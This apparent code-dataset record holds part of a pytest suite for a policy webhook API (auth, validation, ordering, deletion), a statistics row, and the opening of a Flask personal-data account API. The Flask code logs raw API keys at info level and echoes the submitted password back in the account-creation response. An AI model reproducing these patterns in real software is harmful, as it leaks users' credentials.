return V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key=policy.key)
def test_put_pre_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_pre_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_invalid_policy(
self, db, api_client, generate_auth_header, valid_webhook_request
):
url = V1_URL_PREFIX + POLICY_WEBHOOKS_PRE.format(policy_key="my_fake_policy")
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(url, headers=auth_header, json=[valid_webhook_request])
assert resp.status_code == 404
body = json.loads(resp.text)
assert body["detail"] == "No Policy found for key my_fake_policy."
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_invalid_connection_config(
self, db, url, api_client, generate_auth_header, valid_webhook_request
):
invalid_connection_config_body = {
"connection_config_key": "unknown_connection_key",
"direction": "one_way",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 404
body = json.loads(resp.text)
assert (
body["detail"]
== "No connection configuration found with key 'unknown_connection_key'."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_direction_error_fails_all(
self,
db,
https_connection_config,
generate_auth_header,
api_client,
url,
valid_webhook_request,
):
invalid_connection_config_body = {
"connection_config_key": https_connection_config.key,
"direction": "invalid_direction",
"name": "my_pre_execution_webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, invalid_connection_config_body],
)
assert resp.status_code == 422
body = json.loads(resp.text)
assert (
body["detail"][0]["msg"]
== "value is not a valid enumeration member; permitted: 'one_way', 'two_way'"
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_keys(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, valid_webhook_request],
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
name_only = {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Poke Snowflake Webhook",
}
resp = api_client.put(
url, headers=auth_header, json=[valid_webhook_request, name_only]
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
assert db.query(PolicyPreWebhook).count() == 0 # All must succeed or fail
def test_put_pre_execution_webhooks_duplicate_names(
self,
db,
url,
api_client,
generate_auth_header,
valid_webhook_request,
https_connection_config,
):
second_payload = valid_webhook_request.copy()
second_payload["key"] = "new_key"
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
            json=[valid_webhook_request, second_payload],  # same name, different key
)
assert resp.status_code == 400
body = json.loads(resp.text)
assert (
body["detail"]
== "Check request body: there are multiple webhooks whose keys or names resolve to the same value."
)
def test_create_multiple_pre_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Pre Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "poke_snowflake_webhook",
"name": "Poke Snowflake Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_pre_execution_webhook",
"name": "My Pre Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
pre_webhooks = PolicyPreWebhook.filter(
db=db,
conditions=(
PolicyPreWebhook.key.in_(
["my_pre_execution_webhook", "poke_snowflake_webhook"]
)
),
)
assert pre_webhooks.count() == 2
for webhook in pre_webhooks:
webhook.delete(db=db)
def test_update_webhooks_reorder(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
assert policy_pre_execution_webhooks[0].key == "pre_execution_one_way_webhook"
assert policy_pre_execution_webhooks[0].order == 0
assert policy_pre_execution_webhooks[1].key == "pre_execution_two_way_webhook"
assert policy_pre_execution_webhooks[1].order == 1
# Flip the order in the request
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[1].direction.value,
"name": policy_pre_execution_webhooks[1].name,
"key": policy_pre_execution_webhooks[1].key,
},
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert body[0]["key"] == "pre_execution_two_way_webhook"
assert body[0]["order"] == 0
assert body[1]["key"] == "pre_execution_one_way_webhook"
assert body[1]["order"] == 1
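    # Illustrative sketch, not part of the original suite: the reorder
    # behaviour asserted above suggests the PUT endpoint assigns each
    # webhook's "order" from its index in the request body; a hypothetical
    # pure-Python model of that rule:
    @staticmethod
    def _order_from_position(webhook_keys):
        return [{"key": key, "order": index} for index, key in enumerate(webhook_keys)]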
def test_update_hooks_remove_hook_from_request(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
# Only include one hook
request_body = [
{
"connection_config_key": https_connection_config.key,
"direction": policy_pre_execution_webhooks[0].direction.value,
"name": policy_pre_execution_webhooks[0].name,
"key": policy_pre_execution_webhooks[0].key,
},
]
resp = api_client.put(
url,
headers=auth_header,
json=request_body,
)
body = json.loads(resp.text)
assert len(body) == 1 # Other webhook was removed
assert body[0]["key"] == "pre_execution_one_way_webhook"
assert body[0]["order"] == 0
class TestPutPolicyPostExecutionWebhooks:
"""Shares a lot of logic with Pre Execution Webhooks - see TestPutPolicyPreExecutionWebhooks tests"""
@pytest.fixture(scope="function")
def valid_webhook_request(self, https_connection_config) -> Dict:
return {
"connection_config_key": https_connection_config.key,
"direction": "one_way",
"name": "Clear App Cache",
"key": "clear_app_cache",
}
@pytest.fixture(scope="function")
def url(self, policy) -> str:
return V1_URL_PREFIX + POLICY_WEBHOOKS_POST.format(policy_key=policy.key)
def test_put_post_execution_webhooks_unauthenticated(self, url, api_client):
resp = api_client.put(url)
assert resp.status_code == 401
def test_put_post_execution_webhooks_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.put(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_create_multiple_post_execution_webhooks(
self,
db,
generate_auth_header,
api_client,
url,
valid_webhook_request,
https_connection_config,
):
second_webhook_body = {
"connection_config_key": https_connection_config.key,
"direction": "two_way",
"name": "My Post Execution Webhook",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.put(
url,
headers=auth_header,
json=[valid_webhook_request, second_webhook_body],
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert len(body) == 2
assert body == [
{
"direction": "one_way",
"key": "clear_app_cache",
"name": "Clear App Cache",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
{
"direction": "two_way",
"key": "my_post_execution_webhook",
"name": "My Post Execution Webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
]
post_webhooks = PolicyPostWebhook.filter(
db=db,
conditions=(
PolicyPostWebhook.key.in_(
["my_post_execution_webhook", "clear_app_cache"]
)
),
)
assert post_webhooks.count() == 2
for webhook in post_webhooks:
webhook.delete(db=db)
class TestPatchPreExecutionPolicyWebhook:
"""Test updating a single PolicyPreWebhook - however, updates to "order" can affect the orders of other webhooks"""
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_patch_pre_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_pre_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_patch_pre_execution_webhook_invalid_webhook_key(
self, api_client, generate_auth_header, policy
):
        url = V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
            policy_key=policy.key, pre_webhook_key="invalid_webhook_key"
        )
        auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 404
    def test_patch_pre_execution_webhook_invalid_order(
self, generate_auth_header, api_client, url, policy_pre_execution_webhooks
):
request_body = {"order": 5}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 400
response_body = json.loads(resp.text)
assert (
response_body["detail"]
== "Cannot set order to 5: there are only 2 PolicyPreWebhook(s) defined on this Policy."
)
def test_update_name_only(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook"}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 0,
},
"new_order": [],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
assert webhook.order == 0
def test_update_name_and_order(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
request_body = {"name": "Renaming this webhook", "order": 1}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "one_way",
"key": "pre_execution_one_way_webhook",
"name": "Renaming this webhook",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "pre_execution_two_way_webhook", "order": 0},
{"key": "pre_execution_one_way_webhook", "order": 1},
],
}
webhook = PolicyPreWebhook.filter(
db=db, conditions=(PolicyPreWebhook.key == "pre_execution_one_way_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 1
class TestPatchPostExecutionPolicyWebhook:
"""Test updating a single PolicyPostWebhook - however, updates to "order" can affect the orders of other webhooks
This endpoint shares code with the pre-execution PATCH - see TestPatchPreExecutionPolicyWebhook
"""
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
def test_patch_post_execution_webhook_unauthenticated(self, url, api_client):
resp = api_client.patch(url)
assert resp.status_code == 401
def test_patch_post_execution_webhook_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.patch(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_update_name_and_order_and_direction(
self,
db,
generate_auth_header,
api_client,
url,
policy_pre_execution_webhooks,
https_connection_config,
):
webhook = PolicyPostWebhook.filter(
db=db, conditions=(PolicyPostWebhook.key == "cache_busting_webhook")
).first()
db.refresh(webhook)
assert webhook.order == 0
request_body = {
"name": "Better Webhook Name",
"order": 1,
"direction": "two_way",
}
auth_header = generate_auth_header(scopes=[WEBHOOK_CREATE_OR_UPDATE])
resp = api_client.patch(url, headers=auth_header, json=request_body)
assert resp.status_code == 200
response_body = json.loads(resp.text)
assert response_body == {
"resource": {
"direction": "two_way",
"key": "cache_busting_webhook",
"name": "Better Webhook Name",
"connection_config": embedded_http_connection_config(
https_connection_config
),
"order": 1,
},
"new_order": [
{"key": "cleanup_webhook", "order": 0},
{"key": "cache_busting_webhook", "order": 1},
],
}
db.refresh(webhook)
assert webhook.order == 1
class TestDeletePolicyPreWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_pre_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_PRE_WEBHOOK_DETAIL.format(
policy_key=policy.key, pre_webhook_key=policy_pre_execution_webhooks[0].key
)
def test_delete_pre_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_pre_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_pre_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_pre_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_pre_execution_webhooks[1].key, "order": 0}]
}
assert policy.pre_execution_webhooks.count() == 1
class TestDeletePolicyPostWebhook:
@pytest.fixture(scope="function")
def url(self, policy, policy_post_execution_webhooks) -> str:
return V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[0].key,
)
    def test_delete_post_execution_webhook(self, url, api_client):
resp = api_client.delete(url)
assert resp.status_code == 401
def test_delete_post_execution_webhook_detail_wrong_scope(
self, url, api_client, generate_auth_header
):
auth_header = generate_auth_header(scopes=[WEBHOOK_READ])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 403
def test_delete_post_execution_webhook_detail_and_reorder(
self,
url,
api_client,
generate_auth_header,
policy,
policy_post_execution_webhooks,
):
auth_header = generate_auth_header(scopes=[WEBHOOK_DELETE])
resp = api_client.delete(
url,
headers=auth_header,
)
assert resp.status_code == 200
body = json.loads(resp.text)
assert body == {
"new_order": [{"key": policy_post_execution_webhooks[1].key, "order": 0}]
}
assert policy.post_execution_webhooks.count() == 1
url = V1_URL_PREFIX + POLICY_POST_WEBHOOK_DETAIL.format(
policy_key=policy.key,
post_webhook_key=policy_post_execution_webhooks[1].key,
)
resp = api_client.delete(
url,
headers=auth_header,
)
body = json.loads(resp.text)
assert body == {"new_order": []}
assert policy.post_execution_webhooks.count() == 0
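# Illustrative sketch, not from the original suite: the 400 responses asserted
# in the duplicate-key tests above suggest the server slugifies a missing key
# from the webhook's name and rejects bodies where two webhooks collide; a
# hypothetical version of that check:
def _has_colliding_webhooks(webhooks):
    keys = [w.get("key") or w["name"].lower().replace(" ", "_") for w in webhooks]
    return len(keys) != len(set(keys))

assert _has_colliding_webhooks(
    [{"key": "poke_snowflake_webhook"}, {"name": "Poke Snowflake Webhook"}]
)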
| 34.41592 | 123 | 0.608766 | 3,754 | 34,588 | 5.235482 | 0.055674 | 0.074285 | 0.065941 | 0.045792 | 0.869594 | 0.858604 | 0.837489 | 0.809352 | 0.785387 | 0.777653 | 0 | 0.010393 | 0.304556 | 34,588 | 1,004 | 124 | 34.450199 | 0.806685 | 0.020816 | 0 | 0.73702 | 0 | 0 | 0.107485 | 0.032044 | 0 | 0 | 0 | 0 | 0.108352 | 1 | 0.066591 | false | 0 | 0.009029 | 0.013544 | 0.102709 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91b9f9c07904975ec550367163348446c811df03 | 106,439 | py | Python | Account/app/mod_account/view_api.py | mydata-sdk/mydata-sdk-1.x | 74064d7a42fc0435511eae6e77e49ddc7d9723f3 | ["MIT"] | stars: null | issues: 2 (2018-04-21T04:09:46.000Z – 2018-04-30T21:54:09.000Z) | forks: null (fititnt/mydata-sdk--hiit @ 19d7a2ddbc3b5a05665539fbcc7f461c13793e03) |
# -*- coding: utf-8 -*-
# Import dependencies
import json
import uuid
import logging
import bcrypt # https://github.com/pyca/bcrypt/, https://pypi.python.org/pypi/bcrypt/2.0.0
#from Crypto.Hash import SHA512
#from Crypto.Random.random import StrongRandom
from random import randint
# Import flask dependencies
from flask import Blueprint, render_template, make_response, flash, session, request
from flask_login import login_user, login_required
from flask_restful import Resource, Api, reqparse
# Import the database object from the main app module
from app import db, api, login_manager, app
# Import services
from app.helpers import get_custom_logger, make_json_response, ApiError
from app.mod_account.controllers import get_particulars, get_particular, verify_account_id_match, \
update_particular, get_contacts, add_contact, get_contact, update_contact, get_emails, add_email, get_email, \
update_email, get_telephone, update_telephone, get_telephones, add_telephone, get_settings, add_setting, get_setting, \
update_setting, get_event_log, get_event_logs, get_slrs, get_slr, get_slsrs, get_slsr, get_cr, get_crs, get_csrs, \
get_csr, export_account
from app.mod_account.models import AccountSchema2, ParticularsSchema, ContactsSchema, ContactsSchemaForUpdate, \
EmailsSchema, EmailsSchemaForUpdate, TelephonesSchema, TelephonesSchemaForUpdate, SettingsSchema, \
SettingsSchemaForUpdate
from app.mod_api_auth.controllers import gen_account_api_key, requires_api_auth_user, provideApiKey
from app.mod_blackbox.controllers import gen_account_key
from app.mod_database.helpers import get_db_cursor
from app.mod_database.models import Account, LocalIdentityPWD, LocalIdentity, Salt, Particulars, Email
from app.mod_api_auth.controllers import get_account_id_by_api_key
mod_account_api = Blueprint('account_api', __name__, template_folder='templates')
# create logger with 'spam_application'
logger = get_custom_logger(__name__)
# Resources
class Accounts(Resource):
def post(self):
"""
Example JSON
{
"data": {
"type": "Account",
"attributes": {
'firstName': 'Erkki',
'lastName': 'Esimerkki',
'dateOfBirth': '2016-05-31',
                    'email': 'erkki.esimerkki@example.org',
'username': 'testUser',
'password': 'Hello',
'acceptTermsOfService': 'True'
}
}
}
:return:
"""
try:
endpoint = str(api.url_for(self))
except Exception as exp:
endpoint = str(__name__)
# load JSON
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = AccountSchema2()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
username = json_data['data']['attributes']['username']
password = json_data['data']['attributes']['password']
firstName = json_data['data']['attributes']['firstName']
lastName = json_data['data']['attributes']['lastName']
email_address = json_data['data']['attributes']['email']
dateOfBirth = json_data['data']['attributes']['dateOfBirth']
acceptTermsOfService = json_data['data']['attributes']['acceptTermsOfService']
global_identifier = str(uuid.uuid4())
salt_str = str(bcrypt.gensalt())
pwd_hash = bcrypt.hashpw(str(password), salt_str)
except Exception as exp:
error_title = "Could not prepare Account data"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
# DB cursor
cursor = get_db_cursor()
try:
###
# Accounts
logger.debug('Accounts')
account = Account(global_identifyer=global_identifier)
account.to_db(cursor=cursor)
###
# localIdentityPWDs
logger.debug('localIdentityPWDs')
local_pwd = LocalIdentityPWD(password=pwd_hash)
local_pwd.to_db(cursor=cursor)
###
# localIdentities
logger.debug('localIdentities')
local_identity = LocalIdentity(
username=username,
pwd_id=local_pwd.id,
accounts_id=account.id
)
local_identity.to_db(cursor=cursor)
###
# salts
logger.debug('salts')
salt = Salt(
salt=salt_str,
identity_id=local_identity.id
)
salt.to_db(cursor=cursor)
###
# Particulars
logger.debug('particulars')
particulars = Particulars(
firstname=firstName,
lastname=lastName,
date_of_birth=dateOfBirth,
account_id=account.id
)
logger.debug("to_dict: " + repr(particulars.to_dict))
cursor = particulars.to_db(cursor=cursor)
###
# emails
logger.debug('emails')
email = Email(
email=email_address,
type="Personal",
prime=1,
account_id=account.id
)
email.to_db(cursor=cursor)
###
# Commit
db.connection.commit()
except Exception as exp:
error_title = "Could not create Account"
logger.debug('commit failed: ' + repr(exp))
logger.debug('--> rollback')
logger.error(error_title)
db.connection.rollback()
raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
            logger.debug('Account committed')
try:
logger.info("Generating Key for Account")
kid = gen_account_key(account_id=account.id)
except Exception as exp:
error_title = "Could not generate Key for Account"
logger.debug(error_title + ': ' + repr(exp))
#raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Generated Key for Account with Key ID: " + str(kid))
try:
logger.info("Generating API Key for Account")
api_key = gen_account_api_key(account_id=account.id)
except Exception as exp:
error_title = "Could not generate API Key for Account"
logger.debug(error_title + ': ' + repr(exp))
#raise ApiError(code=500, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Generated API Key: " + str(api_key))
data = cursor.fetchall()
logger.debug('data: ' + repr(data))
# Response data container
try:
response_data = {}
response_data['meta'] = {}
response_data['meta']['activationInstructions'] = "Account activated already"
response_data['data'] = {}
response_data['data']['type'] = "Account"
response_data['data']['id'] = str(account.id)
response_data['data']['attributes'] = json_data['data']['attributes']
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=201)
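# Illustrative sketch, not part of this module: the password handling in
# Accounts.post above reduces to bcrypt's two-step API, and a later login
# check re-hashes the candidate against the stored hash (names hypothetical):
#
#     salt = bcrypt.gensalt()
#     stored_hash = bcrypt.hashpw("Hello", salt)
#     assert bcrypt.hashpw("Hello", stored_hash) == stored_hash  # login check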
class AccountExport(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountExport")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Account Export
try:
logger.info("Exporting Account")
db_entries = export_account(account_id=account_id)
except Exception as exp:
error_title = "Account Export failed"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Account Export Succeed")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountParticulars(Resource):
@requires_api_auth_user
def get(self, account_id):
logger.info("AccountParticulars")
try:
endpoint = str(api.url_for(self, account_id=account_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Particulars
try:
logger.info("Fetching Particulars")
db_entries = get_particulars(account_id=account_id)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title + repr(exp))
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Fetched")
logger.info("Particulars: ")
# Response data container
try:
db_entry_list = db_entries
response_data = {}
response_data['data'] = db_entry_list
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
class AccountParticular(Resource):
@requires_api_auth_user
def get(self, account_id, particulars_id):
logger.info("AccountParticulars")
try:
endpoint = str(api.url_for(self, account_id=account_id, particulars_id=particulars_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
particulars_id = str(particulars_id)
except Exception as exp:
error_title = "Unsupported particulars_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("particulars_id: " + particulars_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs are matching")
# Get Particulars
try:
logger.info("Fetching Particulars")
db_entries = get_particular(account_id=account_id, id=particulars_id)
except Exception as exp:
error_title = "No Particulars found"
logger.error(error_title)
raise ApiError(code=404, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("Particulars Fetched")
# Response data container
try:
response_data = {}
response_data['data'] = db_entries
except Exception as exp:
logger.error('Could not prepare response data: ' + repr(exp))
raise ApiError(code=500, title="Could not prepare response data", detail=repr(exp), source=endpoint)
else:
logger.info('Response data ready')
logger.debug('response_data: ' + repr(response_data))
response_data_dict = dict(response_data)
logger.debug('response_data_dict: ' + repr(response_data_dict))
return make_json_response(data=response_data_dict, status_code=200)
@requires_api_auth_user
def patch(self, account_id, particulars_id):
logger.info("AccountParticular")
try:
endpoint = str(api.url_for(self, account_id=account_id, particulars_id=particulars_id))
except Exception as exp:
endpoint = str(__name__)
try:
logger.info("Fetching Api-Key from Headers")
api_key = request.headers.get('Api-Key')
except Exception as exp:
logger.error("No ApiKey in headers: " + repr(repr(exp)))
return provideApiKey(endpoint=endpoint)
else:
logger.info("Api-Key: " + api_key)
try:
account_id = str(account_id)
except Exception as exp:
error_title = "Unsupported account_id"
logger.error(error_title)
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("account_id: " + account_id)
try:
particulars_id = str(particulars_id)
except Exception as exp:
error_title = "Unsupported particulars_id"
logger.error(error_title + repr(exp))
raise ApiError(code=400, title=error_title, detail=repr(exp), source=endpoint)
else:
logger.info("particulars_id: " + particulars_id)
# Check if Account IDs from path and ApiKey are matching
if verify_account_id_match(account_id=account_id, api_key=api_key, endpoint=endpoint):
logger.info("Account IDs from path and ApiKey are matching")
# load JSON from payload
json_data = request.get_json()
if not json_data:
error_detail = {'0': 'Set application/json as Content-Type', '1': 'Provide json payload'}
raise ApiError(code=400, title="No input data provided", detail=error_detail, source=endpoint)
else:
logger.debug("json_data: " + json.dumps(json_data))
# Validate payload content
schema = ParticularsSchema()
schema_validation_result = schema.load(json_data)
# Check validation errors
if schema_validation_result.errors:
logger.error("Invalid payload")
raise ApiError(code=400, title="Invalid payload", detail=dict(schema_validation_result.errors), source=endpoint)
else:
logger.debug("JSON validation -> OK")
try:
particulars_id_from_payload = json_data['data'].get("id", "")
except Exception as exp:
error_title = "Could not get id from payload"
logger.error(error_title)
raise ApiError(
code=404,
title=error_title,
detail=repr(exp),
source=endpoint
)
# Check if particulars_id from path and payload are matching
if particulars_id != particulars_id_from_payload:
error_title = "Particulars IDs from path and payload are not matching"
compared_ids = {'IdFromPath': particulars_id, 'IdFromPayload': particulars_id_from_payload}
logger.error(error_title + ", " + json.dumps(compared_ids))
raise ApiError(
code=403,
title=error_title,
detail=compared_ids,
source=endpoint
)
else:
logger.info("Particulars IDs from path and payload are matching")
